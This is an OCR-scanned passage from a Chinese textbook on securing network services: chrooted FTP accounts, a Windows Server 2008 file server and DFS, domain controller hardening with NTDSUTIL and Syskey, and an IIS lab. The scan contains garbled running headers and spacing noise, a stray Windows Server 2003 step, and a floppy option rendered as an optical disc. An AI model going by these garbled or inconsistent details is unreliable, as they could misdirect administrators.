overwrite yes guest 
rename yes guest 
guestgroup ftpuser 


除了 加 guestgroup ftpuser 这 行 ， 其 他 4 行 也 要 加 上 ， 和 否则 用 户 登录 后 ， 虽 然 可 以 达到 
用 户 不 能 返回 上 级 目录 的 目的 ， 但 是 却 只 能 上 传 ， 不 能 覆盖 、 删 除 文件 ! 


相关 命令 : vi /etc/ftpaccess 
相关 文件 : /etc/ftpaccess 
相关 帮助 : man ftpaccess，man chroot 


(4) 向 这 个 用 户 的 根 目录 下 复制 必要 的 文件 , 复制 fp server 自 带 的 目录 , 把 /home/ftp/ 
下 的 bin、 lib 两 个 目录 复制 到 这 个 用 户 的 根 目 录 下 , 因为 一 些 命令 (主要 是 ls) 需 要 Lib 支持 ， 
否则 不 能 列 目录 和 文件 。 

相关 命令 : 


cp -rf /home/ftp/lib /home/testuser; cp -rf /home/ftp/bin /home/testuser 


(5) 关 掉 用 户 的 telnet 权 ， 在 /etc/shells 里 加 一 行 /dev/null ， 然 后 可 以 直接 编辑 
/etc/passwd 文件 ， 把 用 户 的 shell 设置 为 /dev/null。 

相关 命令 : ”vi /etc/passwd 

这 一 步 可 以 在 步 又 (2) 中 创建 一 个 用 户 时 就 先 做 好 。 


—---- 相关 命令 :adduser testuser -g ftpuser -s /dev/null 


8.4 文件 服务 器 的 安全 架设 


文件 服务 是 局 域 网 最 常用 的 服务 之 一 , 以 Windows NT 系统 开始 , 随 着 Windows Server 
系统 家 族 的 不 断 升 级 换代 而 保留 至 今 。 在 局 域 网 中 搭建 文件 服务 器 以 后 ， 就 可 以 通过 设置 
用 户 对 共享 资源 的 访问 权限 来 保证 共享 资源 的 安全 。 本 节 以 Windows Server 2008 系统 为 
例 ， 简 介 搭 建文 件 服务 器 的 方法 。 


8.4.1 启用 并 配置 文件 服务 


Windows Server 2008 新 的 服务 器 管理 器 控制 台 工 具 缓解 了 企业 管理 和 保护 多 个 服务 
器 角色 所 面临 的 压力 。Windows Server 2008 中 的 服务 器 管理 器 用 于 管理 服务 器 的 标识 及 系 
统 信息 、 显 示 服 务 器 状态 、 标 识 服 务 器 角色 配置 问题 ， 以 及 管理 服务 器 上 已 安装 的 所 有 角 
色 。 服 务 器 管理 器 代替 了 Windows Server 2003 中 包含 的 若干 个 功能 ， 包 括 管理 服务 器 、 
配置 服务 器 和 添加 或 删除 Windows 组 件 。 

服务 器 管理 器 也 消除 了 管理 员 在 部 署 服务 器 前 运行 安全 配置 向 导 的 要 求 ， 默 认 情况 下 
服务 器 角色 使 用 推荐 的 安全 设置 进行 配置 ， 一 旦 安装 并 配置 正确 即 可 部 署 。 


1. 服务 器 管理 器 功能 


服务 器 管理 器 是 扩展 的 Microsoft 管理 控制 台 (MMC)， 人 允许 查看 和 管理 影响 服务 器 工 
作 效 率 的 几乎 所 有 信息 和 工具 。 使 用 服务 器 管理 器 中 的 命令 可 以 安装 或 删除 服务 器 角色 和 
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功能 ， 通 过 添加 角色 服务 增强 服务 器 上 已 安装 的 角色 。 
服务 器 管理 器 允许 管理 员 使 用 单个 工具 就 可 完成 以 下 任务 , 从 而 使 服务 器 管理 更 高 效 。 
@ ”查看 和 更 改 服务 器 上 已 安装 的 服务 器 角色 及 功能 。 
@ ”执行 与 服务 器 的 运行 生命 周期 相关 联 的 管理 任务 ， 如 启动 或 停止 服务 以 及 管理 本 
地 用 户 账户 。 
执行 与 服务 器 上 已 安装 角色 的 运行 生命 周期 相关 联 的 管理 任务 。 
确定 服务 器 状态 ， 识 别 关键 事件 ， 分 析 并 解决 配置 问题 和 故障 。 
使 用 Windows 命令 行 安装 或 删除 角色 以 及 角色 服务 和 功能 。 


. 服务 器 管理 器 的 角色 和 功能 


1) 服务 器 角色 

服务 器 角色 是 服务 器 的 主要 功能 。 管理 员 可 以 选择 整个 计算 机 专用 于 一 个 服务 器 角色 ， 
或 在 单 台 计算 机 上 安装 多 个 服务 器 角色 。 每 个 角色 可 以 包括 一 个 或 多 个 角色 服务 ， 更 好 的 
说 法 是 作为 角色 的 子 元 素 。 以 下 服务 器 角色 在 Windows Server 2008 中 可 用 ， 可 以 使 用 服 
务 器 管理 器 进行 安装 和 管理 。 常 用 的 角色 包括 : 和 活动 目录 有 关 的 服务 ， 及 基本 的 网 络 服 

2) 服务 器 功能 

在 Windows Server 2008 中 ， 服 务 器 功能 提供 对 服务 器 的 辅助 或 支持 功能 。 通常 ,管理 
员 添 加 功能 不 会 作为 服务 器 的 主要 功能 ， 但 可 以 增强 安装 角色 的 功能 。 例 如 ， 故 障 转移 群 
集 是 管理 员 可 以 在 安装 了 特定 的 服务 器 角色 后 安装 的 功能 (如 文件 服务 )， 以 将 元 余 添加 到 
文件 服务 并 缩短 可 能 的 灾难 恢复 时 间 。 

3) 服务 器 管理 器 控制 台 

服务 器 管理 器 控制 台 是 一 个 新 的 Microsoft 管理 控制 台 (MMC) 管 理 单元 , 提供 一 个 服务 
器 的 综合 视图 ， 包 括 有 关 服务 器 配置 、 已 安装 角色 的 状态 、 添 加 和 删除 角色 命令 及 功能 的 
信息 。 服 务 器 管理 器 控制 台 的 层次 结构 面板 包含 可 展开 节点 ， 管 理 员 可 用 来 直接 转 到 管理 
特定 角色 的 控制 台 、 疑 难 解答 工具 或 备份 和 灾难 恢复 选项 。 如 图 8-19 所 示 为 服务 器 管理 器 
主 窗口 。 
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8-19 ”服务 器 管理 器 


中 萝 3 章 ， 克 络 厅 友 局 务 安 会 取得 


3. 服务 器 管理 器 向 导 


(1) 添加 角色 向 导 。 

添加 角色 向 导 ， 可 将 一 个 或 多 个 角色 添加 到 服务 器 ， 自 动 检查 角色 之 间 的 依存 关系 并 
验证 已 为 选中 的 每 个 角色 安装 了 所 有 必需 的 角色 和 角色 服务 。 

对 于 某 些 角 色 ， 如 终端 服务 和 Active Directory 证 书 服 务 ， 添 加 角色 向 导 也 提供 配置 
页 ， 人 允许 用 户 指定 应 如 何 配置 角色 作为 安装 过 程 的 一 部 分 。 

(2) 添加 角色 服务 向 导 。 

绝 大 多 数 角色 ， 如 文件 服务 ， 终 端 服 务 和 Active Directory 证 书 服务 由 多 个 子 元 素 组 
成 ， 由 服务 器 管理 器 界面 中 的 “角色 服务 ”标识 。 

当 安装 了 其 中 的 一 个 复杂 角色 后 , 可 以 使 用 添加 角色 服务 向 导 将 角色 服务 添加 到 角色 。 
打开 添加 角色 服务 向 导 的 命令 可 在 服务 器 管理 器 控制 台 的 每 个 角色 主页 上 找到 。 

G) 添加 功能 向 导 。 

添加 功能 向 导 可 使 在 单一 会 话 中 将 一 项 或 多 项 功能 安装 到 计算 机 上 。 

打开 添加 功能 向 导 的 命令 位 于 “初始 配置 任务 ”窗口 的 “ 自 定义 此 服务 器 ”区 域 ， 也 
可 在 服务 器 管理 器 控制 台 窗口 的 “功能 摘要 ”部 分 中 找到 。 

(4) 删除 角色 向 导 。 

删除 角色 向 导 ， 可 用 于 从 服务 器 删除 一 个 或 多 个 角色 ， 自 动 检查 角色 之 间 的 依存 关系 
并 验证 已 为 不 想 删 除 的 角色 保留 安装 了 必需 的 角色 和 角色 服务 。 删 除 角 色 向 导 进 程 可 防止 
意外 删除 在 服务 器 上 保留 角色 所 需 的 角色 或 角色 服务 。 

(5) 删除 角色 服务 向 导 。 

可 以 使 用 删除 角色 服务 向 导 从 安装 的 角色 删除 角色 服务 。 打 开 删 除 角色 服务 向 导 的 命 
令 可 在 服务 器 管理 器 控制 台 的 每 个 角色 主页 上 找到 。 

(6) 删除 功能 向 导 。 

删除 功能 向 导 可 使 在 单个 会 话 中 从 计算 机 删除 一 项 或 多 项 功能 。 

打开 删除 功能 向 导 的 命令 位 于 “初始 配置 任务 ”窗口 的 “ 自 定义 此 服务 器 ”区 ， 也 可 
在 服务 器 管理 器 控制 台 窗 口 的 “功能 摘要 ”部 分 中 找到 。 

服务 器 管理 器 中 的 向 导 通 过 削减 早期 Windows Server 版 本 中 安装 、 配 置 或 删除 角色 、 
角色 服务 和 功能 的 时 间 ， 简 化 了 在 企业 中 部 署 服务 器 的 任务 。 使 用 服务 器 管理 器 向 导 可 以 
在 单个 会 话 中 安装 或 删除 多 个 角色 、 角 色 服 务 或 功能 。 

重要 的 是 ， 当 正在 进行 服务 器 管理 器 向 导 时 ，Windows Server 2008 会 执行 依存 关系 检 
查 ， 确 保 选 定 角色 所 需 的 所 有 角色 和 角色 服务 都 已 安装 ， 确 保 保 留 的 角色 或 角色 服务 所 需 
的 角色 和 角色 服务 不 被 删除 。 


4. 配置 文件 服务 器 

打开 服务 器 管理 器 ， 单 击 “ 角 色 ” 按 钮 ， 选 择 窗口 右 侧 的 添加 角色 ， 打 开 添 加 角色 向 
导 对 话 框 ， 如 图 8-20 所 示 。 

单 击 “下 一 步 ” 按 钮 ， 打 开 “ 选 择 服务 器 角色 ”界面 ， 选 中 “文件 服务 ” 复 选 框 ， 
如 图 8-21 所 示 。 
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图 8-20 添加 角色 向 导 


图 8-21 选择 文件 服务 


单 击 “下 一 步 ”按钮 ， 打 开 “ 文 件 服务 ”提示 窗口 ， 然 后 继续 单 击 “ 下 一 步 ”。 在 出 
现 的 “选择 角色 服务 ”界面 中 ， 选 中 “文件 服务 器 ”和 “Windows Search 服务 ” 复 选 框 ， 
如 图 8-22 所 示 。 


图 8-22 选择 角色 服务 


单 击 “ 下 一 步 ” 按 钮 ， 选 择 需 要 索引 的 卷 。 如 图 8-23 所 示 ， 并 继续 单 击 “下 一 步 ” 
按钮 。 
在 打开 的 如 图 8-24 所 示 的 “确认 安装 选择 ”界面 中 ， 单 击 “ 安 装 ” 按 钮 ， 开 始 安装 。 


图 8-24 确认 安装 选择 


显示 的 安装 进度 和 安装 结果 如 图 8-25 和 图 8-26 所 示 。 
[sawss | 
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图 8-25 安装 进度 显示 
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图 8-26 安装 结果 显示 


在 “服务 器 管理 器 ”中 ， 展 开 “ 和 角色” 一 “文件 服务 ”一 “共享 和 存储 管理 ”选项 。 
如 图 8-27 所 示 ， 选 择 右 侧 “ 设 置 共享 ” 选 项 。 


图 8-27 设置 共享 
浏览 需要 共享 的 文件 夹 ， 如 图 8-28 所 示 。 


图 8-28 选择 共享 文件 夹 


芳 23 萌 克 绑 应 忆 碾 稳 安 全 友 音 


单 击 “ 下 一 步 ” 按 钮 ，NTFS 权限 设置 界面 ， 如 图 8-29 所 示 。 然 后 ， 单 击 “编辑 权限 ” 
按钮 ， 打 开 文 件 夹 权限 设置 对 话 框 ， 如 图 8-30 所 示 。 
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图 8-30 
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8-29 更 改 NTFS 权限 
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“共享 文件 夹 ”权限 设置 对 话 框 


在 这 里 可 以 根据 需要 对 不 同 用 户 设 置 不 同 的 权限 ， 例 如 可 以 对 Administrators 用 户 组 
设置 完全 控制 以 赋予 所 有 管理 员 对 该 共享 文件 夹 的 全 部 管理 权限 ， 为 Guest 用 户 设置 读 取 
权限 ， 使 匿名 用 户 可 以 下 载 该 文件 夹 中 的 文件 ， 同 时 删除 原 有 的 Everyone 选项 ， 屏 蔽 所 有 


其 他 


户 权 限 。 


然后 再 进行 共享 协议 设置 。 选 中 SMB 复 选 框 ， 确 定 共 享 名 ， 单 击 “ 下 一 步 ”按钮 ， 
如 图 8-31 所 示 。 
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图 8-31 “共享 协议 ”设置 界面 


在 打开 的 “SMB 设置 ”界面 中 ， 单 击 “ 高 级 ”按钮 ， 可 以 配置 一 些 高 级 选项 ， 如 
图 8-32 所 示 。 


图 8-32 “SMB 设置 ”界面 
在 “用 户 限制 ”选项 卡 中 ， 可 以 限制 同时 连接 这 个 共享 的 用 户 数 ， 或 者 启用 “基于 访 
问 权限 的 枚 举 ”， 如 图 8-33 所 示 。 


图 8-33 “SMB 设置 ”用 户 限制 设置 
在 “缓存 ”选项 卡 中 ， 可 以 设置 这 个 共享 文件 夹 是 否 可 以 在 客户 端 缓存 ， 如 图 8-34 


图 8-34 “SMB 设置 ”缓存 设置 
完成 “高 级 ”选项 的 设置 后 ， 单 击 “ 下 一 步 ” 按 钮 ， 打 开 “SMB 权限 ”设置 界面 ， 选 
中 “所 有 用 户 和 组 只 有 读 取 访 问 权限 ” 单 选 按 钮 ， 如 图 8-35 所 示 ， 单 击 “ 下 一 步 ”按钮 。 


图 8-35 “SMB 权限 ”设置 


弹出 “复查 设置 并 创建 共享 ”界面 后 ， 单 击 “ 创 建 ”按钮 ， 直 到 显示 创建 成 功 ， 并 单 
击 “ 关 闭 ” 按 钮 ， 如 图 8-36 和 图 8-37 所 示 。 


图 8-36 “复查 设置 并 创建 共享 ”界面 
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图 8-37 创建 成 功 显示 
在 共享 和 存储 管理 中 ， 可 以 看 到 新 建 的 share 共享 ， 如 图 8-38 所 示 。 


图 8-38 在 “服务 管理 器 ”中 查看 共享 目录 
选中 share 共享 文件 夹 ， 在 右 侧 启用 或 者 停止 共享 ， 如 图 8-39 所 示 。 
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图 8-39 对 共享 目录 “share” 进 行 管理 


中 萝 章 ， 历 络 率 帮 成 务 安 全 双生 
也 可 以 选择 “属性 ” ， 对 这 个 共享 的 属性 进行 再 调整 ， 如 图 8-40 所 示 。 
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图 8-40 共享 目录 “share” 属 性 调整 窗口 
8.4.2 “分布 式 文件 系统 


分 布 式 文件 系统 是 Windows 系统 网 络 存储 构架 的 核心 技术 之 一 ， 可 以 实现 将 网 络 上 位 
于 不 同位 置 的 文件 挂 接 在 统一 命名 空间 之 下 。 在 管理 工具 中 选择 “服务 器 管理 器 ”选项 ， 
选择 添加 “角色 ”中 的 “文件 服务 ”选项 ， 打 开 “ 选 择 角色 服务 ”界面 ， 选 中 “分 布 式 文 
件 系统 ” 复 选 框 ， 如 图 8-41 所 示 。 


Pe EE 了 h 少 


图 8-41 角色 服务 选择 “分 布 式 文件 系统 ” 


单 击 “下 一 步 ”按钮 ， 打 开 “ 创 建 DFS 命名 空间 ” 复 选 框 ， 选 中 “立即 使 用 此 向 导 创 
建 命名 空间 ” 单 选 按钮 ， 输 入 命名 空间 名 称 ， 如 图 8-42 所 示 。 单 击 “ 下 一 步 ”按钮 。 
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图 8-42 创建 DFS 命名 空间 

选中 “独立 命名 空间 ” 单 选 按 钮 ， 如 图 8-43 所 示 ， 单 击 “ 下 一 步 ” 按 钮 ， 再 单 击 “ 安 
装 ”按钮 ， 开 始 安 装 DFS， 如 图 8-44 所 示 。 

EET TE 


图 8-44 “确认 安装 选择 ”界面 
安装 完成 后 ， 单 击 “ 关 闭 ” 按 钮 ， 如 图 8-45 所 示 。 
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8-45 “DFS 命名 空间 ”安装 完成 窗口 


对 DFS 进行 配置 ， 选 择 “ 开 始 ” 一 “程序 ”一 “管理 工具 ”一 DFS Management 命令 
打开 DFS 管理 器 。 右 击 已 建立 的 命名 空间 ， 选 择 “ 新 建文 件 夹 ” 命 令 ， 如 图 8-46 所 示 。 
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图 8-46 在 DFS 管理 “新 建文 件 夹 ” 


在 “名 称 ” 文 本 框 中 输入 要 使 用 的 文件 夹 名称 ， 单 击 “ 添 加 ”按钮 ， 输 入 网 络 中 已 共 
享 的 文件 夹 路 径 (也 可 以 单 击 “ 浏 览 ” 按钮 ， 浏 览 网 络 中 的 共享 文件 来 ， 并 选择 )， 单 击 “ 确 
定 ” 按 钮 ， 如 图 8-47 所 示 。 
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图 8-47 添加 文件 夹 目标 路 径 
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再 次 单 击 “ 确 定 ”按钮 ， 已 建立 的 共享 文件 夹 如 图 8-48 所 示 。 


图 8-48 “共享 文件 夹 ”创建 成 功 


访问 DFS 中 的 共享 资源 ， 可 以 在 “运行 ”对 话 框 中 输入 DFS 所 在 计算 机 的 人 P 地 址 或 
名 称 ， 按 Enter 键 。 双 击 命名 空间 的 名 称 ， 如 : test， 可 以 看 到 其 中 的 共享 文件 夹 。 用 户 可 
以 像 访问 本 机 文件 夹 一 样 访问 这 些 链接 到 其 他 计算 机 的 共享 文件 夹 。 


8.5 ” 域 控制 器 的 安全 架设 


域 控制 器 正如 其 名 ， 它 具有 对 整个 Windows 域 以 及 域 中 的 所 有 计算 机 的 管理 权限 。 因 
此 你 必须 花费 更 多 的 精力 来 确保 域 控制 器 的 安全 ， 并 保持 其 安全 性 。 本 文 将 带 你 了 解 一 些 
在 域 控制 器 上 应 该 部 署 的 安全 措施 。 


8.5.1 域 控制 器 的 物理 安全 


第 一 步 (也 是 常常 被 忽视 的 一 步 ) 就 是 要 保障 你 的 域 控制 器 的 物理 安全 。 也 就 是 说 ， 你 
应 该 将 服务 器 放 在 一 间 带 锁 的 房间 , 并 且 严格 地 审核 和 记录 该 房间 的 访问 情况 。 不 要 有 “ 隐 
珊 起 来 就 具有 很 好 的 安全 性 ”这 样 的 观点 ， 错 误 地 认为 将 这 样 一 台 关 键 的 服务 器 放 在 一 个 
偏僻 的 地 方 而 不 加 以 任何 保护 ， 就 可 以 抵御 那些 顽固 的 数据 间谍 和 破坏 分 子 的 攻击 。 

因为 专门 从 事 犯 罪 预 防 研究 的 警察 告诉 我 们 ， 我 们 是 没有 办 法 使 自己 的 家 、 公 司 、 汽 
车 ， 当 然 也 包括 我 们 的 服务 器 具有 百分之百 的 安全 性 的 。 安 全 措施 并 不 能 保证 你 的 贵重 物 
品 不 被 那些 “坏人 ” 拿 到 ， 它 只 能 增加 他 们 获取 贵重 物品 的 难度 。 如 果 你 能 让 他 们 的 攻击 
过 程 持续 更 长 的 时 间 ， 那 么 他 们 放弃 攻击 或 停止 尝试 ， 甚 至 将 他 们 当场 抓 住 的 可 能 性 都 会 
大 大 增加 。 

物理 安全 之 后 ， 就 应 该 部 署 多 层 防御 计划 。 带 锁 的 服务 器 间 只 是 第 一 层 ， 这 只 能 被 认 
为 是 周边 安全 ， 就 像 你 院子 周边 的 篇 钨 或 者 你 家 房 门 的 锁 。 万 一 周边 安全 被 突破 ， 就 应 该 
为 保护 目标 (此 时 即 DC) 进 一 步 设置 一 些 安全 措施 以 保护 它们 。 你 可 能 会 安装 安全 警报 系 
统 ， 以 便当 你 的 篇 钨 或 者 门 锁 遭 到 破坏 的 时 候 ， 通 知 你 或 者 警察 。 同 样 ， 你 应 该 考虑 在 服 
务 器 问 部 署 警 报 系统 ， 当 未 授权 用 户 (他 不 知道 解除 警报 系统 的 密码 ) 进 入 服务 器 问 的 时 候 ， 
它 就 发 出 声音 警报 。 另 外 还 可 以 考虑 在 门 上 安装 探测 器 ， 以 及 红外 探测 器 以 防止 通过 门 、 
窗 及 其 他 孔洞 (我 们 强烈 建议 ， 尽 可 能 减少 门 、 窗 及 孔洞 的 数量 ) 的 非法 进入 。 

当 你 从 里 至 外 地 部 署 你 的 多 层 安 全 计划 时 ， 你 应 该 反复 问 自己 一 个 问题 “如 果 这 个 安 


ME 


全 措施 失效 了 怎么 办 ? 我 们 可 以 在 入 侵 者 的 攻击 线路 上 部 署 哪 些 新 的 障碍 ? ”就 像 你 将 自 
己 的 金钱 和 珠宝 放 在 一 个 有 篇 钨 的 、 带 锁 的 、 有 警报 系统 保护 的 房间 中 ， 你 也 应 该 考虑 服 
务 器 自身 的 安全 。 下 面 是 一 些 准则 。 

(1) 移 除 所 有 的 可 移动 存储 设备 驱动 器 ， 如 光驱 、 外 置 硬盘 、Zip 驱动 器 、 闪 存 驱 动 器 
等 。 这 将 增加 入 侵 者 向 服务 器 上 传 程序 (如 病毒 或 下 载 数据 的 难度 。 如 果 你 不 使 用 这 些 设 
备 , 你 也 可 以 移 除 这 些 外 部 设备 需要 使 用 的 端口 (从 BIOS 中 关闭 或 物理 移 除 )。 这些 端 口 包 
括 USB/TEEE 1394、 串 口 、 并 口 、SCSI 接 口 等 。 

(2) 将 机 箱 锁 好 ， 以 防止 未 授权 用 户 盗窃 硬 盘 ， 或 损坏 机 器 组 件 。 

(3) 将 服务 器 放 在 密闭 带 锁 的 服务 器 机 架 中 (确保 提供 良好 的 通风 设备 )， 电 源 设备 最 
好 也 能 设置 在 服务 器 机 架 中 。 以 避免 入 侵 者 能 够 方便 地 切断 电源 或 UPS， 从 而 干扰 系统 的 


电力 供应 。 


8.5.2 ”防止 域 控制 器 的 远程 入 侵 


如 果 你 认为 你 的 物理 安全 计划 已 经 足够 完美 ， 那 么 你 就 要 将 你 的 注意 力 转移 到 防止 黑 
客 和 攻击 者 通过 网 络 访问 你 的 域 控制 器 。 当 然 ，“ 最 好 的 ”方法 是 将 域 控制 器 从 网 络 中 断 
开 ， 但 是 如 果 这 样 ， 域 控制 器 也 就 毫 无 用 处 了 。 因 此 ， 你 要 通过 一 些 步骤 ， 加 固 它们 ， 以 
抵御 一 般 的 攻击 方法 。 

1. 保障 域 账号 的 安全 

最 简单 的 (对 于 黑客 来 说 )， 最 让 人 意 想不到 的 ， 也 是 最 常用 的 方法 就 是 通过 一 个 合法 
的 账号 密码 登录 系统 ， 以 获得 网 络 和 域 控制 器 的 访问 权限 。 

在 一 个 典型 的 安装 中 ， 黑 客 如 想 登 录 系 统 ， 只 需要 两 个 东西 : 一 个 合法 账号 ， 以 及 它 


对 应 的 密码 。 如 果 你 仍 使 用 的 是 默认 的 管理 员 账号 


Administrator， 这 将 使 黑客 的 入 侵 容 


易 很 多 。 他 需要 做 的 只 是 收集 一 些 信息 。 与 其 他 账号 不 同 ， 这 个 默认 的 管理 员 账 号 ， 不 会 
因为 多 次 失败 登录 而 被 锁定 。 这 也 就 意味 着 ， 黑 客 只 要 不 停 地 猜测 密码 (通过 “暴力 破解 ” 
的 方法 破解 密码 )， 直 到 他 拿 到 管理 员 权 限 为 止 。 

这 就 是 为 什么 你 应 该 做 的 第 一 件 事 是 把 系统 内 置 账号 改名 。 当 然 ， 如 果 你 只 是 改名 而 
忘记 修改 默认 的 描述 (“ 计 算 机 / 域 的 内 置 管理 账号 ”) 也 没有 什么 意义 。 所 以 你 要 避免 入 侵 
者 快速 地 找 出 拥有 管理 员 权 限 的 账号 。 当 然 ， 请 记 住 ， 你 所 做 的 措施 都 只 能 减 慢 入 侵 者 入 
侵 的 速度 。 一 个 坚定 的 、 有 能 力 的 黑客 还 是 能 够 绕 过 你 的 安全 措施 的 (例如 ， 管 理 员 账 号 的 
SID 是 不 能 更 改 的 ， 它 通常 是 以 500 结尾 的 。 有 一 些 黑客 可 以 利用 工具 SID 号 来 辨别 出 管 


理 员 的 账号 )。 


在 Windows Server 2008 中 ,完全 的 禁用 内 置 管理 员 账 号 成 为 可 能 。 当 然 如 果 你 想 那 样 
做 ， 必 须要 先 创建 男 外 的 一 个 账号 ， 并 赋予 它 管理 员 的 权限 。 否 则 ， 你 将 发 现 你 自己 也 无 
法 执行 某 些 特权 任务 了 。 当 然 内 置 的 来 宾 账号 是 应 该 被 禁止 的 (默认 就 是 如 此 )。 如 果 一 些 
用 户 需要 具有 来 宾 的 权限 ， 为 他 创建 一 个 名 字 没 那么 显眼 的 新 账号 ， 并 限制 它 的 访问 。 

所 有 的 账号 ， 特 别 是 管理 账号 都 应 该 有 一 个 强壮 的 密码 。 一 个 强壮 的 密码 应 该 包含 8 
位 以 上 的 字符 、 数 字 或 符号 ， 应 该 大 小 写 混 排 ， 而 且 不 应 该 是 字典 中 的 单词 。 用 户 必须 要 


注意 , 不 要 将 密码 


笔 写 下 来 或 者 告诉 其 他 人 (社交 工程 术 也 是 未 授权 取得 访问 权限 的 常用 


加 
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方法 )。 还 可 以 通过 组 策略 来 强制 要 求 密码 在 一 定 的 基础 上 进行 变化 。 

2. 重 定向 活动 目录 数据 库 

活动 目录 的 数据 库 包 含 了 大 量 的 核心 信息 ， 是 应 该 妥善 保护 的 部 分 。 方 法 之 一 就 是 将 
这 些 文件 从 被 攻击 者 熟知 的 默认 位 置 (在 系统 卷 中 ) 转 移 到 其 他 位 置 。 如 果 想 进行 更 深入 的 
保护 ， 考 虑 把 AD 数据 库 文件 移动 到 一 个 有 元 余 或 者 镜像 的 卷 ， 以 便 磁盘 发 生 错误 的 时 候 
你 还 能 恢复 它 。 

活动 目录 的 数据 库 文件 包括 : Ntds.dit; Edb.log; Temp.edb。 

你 可 以 按照 以 下 步骤 , 通过 NTDSUTIL.EXE 这 个 工具 来 转移 活动 目录 的 数据 库 和 日 志 
文件 。 

(1) 重新 启动 域 控制 器 。 

(2) 在 启动 的 时 候 按 下 F8 键 ， 以 访问 高 级 选项 菜单 。 

(3) 在 菜单 中 选择 目录 服务 恢复 模式 。 

(4) 如 果 你 装 有 一 个 以 上 的 Windows Server 2003， 选 择 正确 的 那个 ， 按 Enter 键 继续 。 

(5) 在 登录 提示 的 时 候 ， 使 用 当时 你 提升 服务 器 时 指定 的 活动 目录 ， 恢 复 账号 的 用 户 
密码 登录 。 

(6) 选择 “开始 ”一 “运行 ”命令 ， 输 入 CMD， 运 行 命令 提示 行 。 

(7) 在 命令 提示 行 中 ， 输 入 NTDSUTIL.EXE， 并 执行 。 

(8) 在 NTDSUTIL 的 提示 行 中 ， 输 入 FILES。 

(9) 选择 你 想 要 移动 的 数据 库 或 者 日 志文 件 ， 输 入 MOVE DB TO 或 者 MOVE 
LOGS TO。 

(10) 输入 两 次 QUIT， 退 出 NTDSUTIL， 返 回 到 命令 提示 行 ， 并 关闭 命令 提示 行 窗口 。 

(11) 再 次 重新 启动 域 控制 器 ， 以 正常 模式 进入 Windows Server 2008。 


3. 使 用 Syskey 保障 密码 信息 的 安全 


保存 在 活动 目录 中 的 域 账 号 密码 信息 是 最 为 敏感 的 安全 信息 。 系 统 密 钥 (System Key - 
Syskey) 就 是 用 来 加 密 保存 在 域 控制 器 的 目录 服务 数据 库 中 的 账号 密码 信息 的 。 

Syskey 一 共有 三 种 工作 模式 。 

(1) 所 有 Windows Server 2008 中 默认 采用 的 ， 计 算 机 随机 产生 一 个 系统 密 钥 (system 
key)， 并 将 密 钥 加 密 后 保存 在 本 地 。 在 这 种 模式 中 ， 你 可 以 像 平 时 一 样 地 登录 本 地 计算 机 。 

(2) 系统 密 钥 使 用 和 模式 一 中 是 同样 的 生成 方式 和 存储 方式 ， 但 是 它 使 用 一 个 由 管理 
员 指 定 的 附加 密码 以 提供 更 进一步 的 安全 性 。 当 你 重启 计算 机 的 时 候 ， 你 必须 在 启动 的 时 
候 输入 管理 员 指 定 的 附加 密码 ， 这 个 密码 不 保存 在 本 地 。 

(3) 安全 性 最 高 的 操作 方法 。 计 算 机 随机 产生 的 系统 密 钥 将 被 保存 在 一 张 光盘 上 ， 而 
不 是 计算 机 本 地 。 如 果 你 没有 光盘 的 物理 访问 权限 ， 并 在 系统 提示 时 插入 该 光盘 ， 你 就 无 
法 引导 系统 。 

附注 : 在 使 用 模式 二 和 模式 三 之 前 ， 请 先 考虑 它们 相关 的 特性 。 例 如 ， 可 能 会 需要 管 
理 员 在 本 地 插入 含有 syskey 密码 的 光盘 ， 这 就 意味 着 ， 在 服务 器 端 不 插入 光盘 的 情况 下 ， 
你 将 无 法 实现 服务 器 远程 重启 。 

你 可 以 通过 以 下 方法 创建 system key。 
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(1) 选择 “开始 ”一 “运行 ”命令 ， 输 入 CMD， 运 行 命令 提示 行 。 

(2) 在 命令 提示 行 中 ， 输 入 SYSKEY， 并 执行 。 

(3) 单 击 UPDATE。 选 中 ENCRYPTION ENABLED。 

(4) 如 果 需 要 一 个 syskey 的 开始 密码 ， 单 击 PASSWORD STARTUP。 

(5) 输入 一 个 强健 的 密码 (密码 可 以 含有 12 到 128 个 字符 )。 

(6) 如 果 你 不 需要 开始 密码 ， 单 击 SYSTEM GENERATED PASSWORD。 

(7) 默认 的 选项 是 STORE STARTUP KEYLOCALLY。 如 果 你 想 要 将 密码 保存 在 光盘 
中 ， 选 中 STORE STARTUP KEY ON FLOOPY DISK。 

如 果 使 用 模式 三 ， 将 密码 保存 在 光盘 中 ， 请 确保 该 光盘 有 备份 。 


小 ” 结 


网 络 应 用 服务 的 安全 是 网 络 与 信息 安全 中 重要 组 成 部 分 。 在 本 文中 ， 我 们 讨论 了 保证 
IIS 自身 的 安全 性 ，IIS Web 服务 器 的 安全 架设 ，FTP 服务 器 的 安全 架设 ， 匿 名 FTP 的 安全 
设 定 ， 文 件 服务 器 的 安全 搭建 ， 如 何 保障 域 控制 器 的 物理 安全 ， 如 何 保障 域 账 号 的 安全 性 ， 
重 定 位 活动 目录 的 数据 库 文件 ， 以 及 如 何 使 用 Syskey 工具 来 保护 存储 在 域 控制 器 中 的 账号 
密码 信息 。 


本 章 实 训 
实 训 一 “新 建 Web 站 点 ， 禁 用 匿名 身份 验证 


1， 实 训 目 的 
了 解 常用 的 网 络 应 用 服务 的 种 类 ， 人 掌握 IS 信息 服务 中 的 Web 服务 器 的 安全 架设 。 
2. 实 训 内 容 


在 计算 机 上 利用 IIS 创建 一 个 Web 站 点 。 其 中 ， 站 点 名 称 为 “test01”; 禁用 匿名 身份 


3. 实 训 步 骤 
(1) 添加 Web 服务 器 角色 ， 如 图 8-49 所 示 。 


图 8-49 添加 Web 服务 器 角色 
设置 角色 服务 ， 如 图 8-50 所 示 。 
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图 8-50 角色 服务 各 选项 设置 
按 提示 操作 ， 直 至 提示 安装 成 功 ， 如 图 8-51 所 示 。 


窜 i 自动 更 新 。 若 要 安装 最 新 更 新 ， 请 使 用 “控制 面板 ” 
全 Web 服务 器 CITS) 加 支 装 成 功 


图 8-51 Web 服务 器 安装 成 功 提示 


(2) 右 击 主 机 ， 选 择 “ 添 加 网 站 ”命令 ， 打 开 “ 添 加 网 站 ”对 话 框 ， 如 图 8-52 所 示 。 
添加 好 各 项 内 容 后 ， 单 击 “ 确 定 ”按钮 ， 新 网 站 “test01 ”添加 成 功 。 然 后 选中 新 添加 
的 网 站 test01 找到 IS 中 的 身份 验证 选项 ， 如 图 8-53 所 示 。 


图 8-52 “添加 网 站 ”对 话 框 
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图 8-53 选择 “身份 验证 ”选项 
双击 该 选项 ， 打 开 如 图 8-54 所 示 窗 口 。 
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图 8-54 “身份 验证 ”窗口 
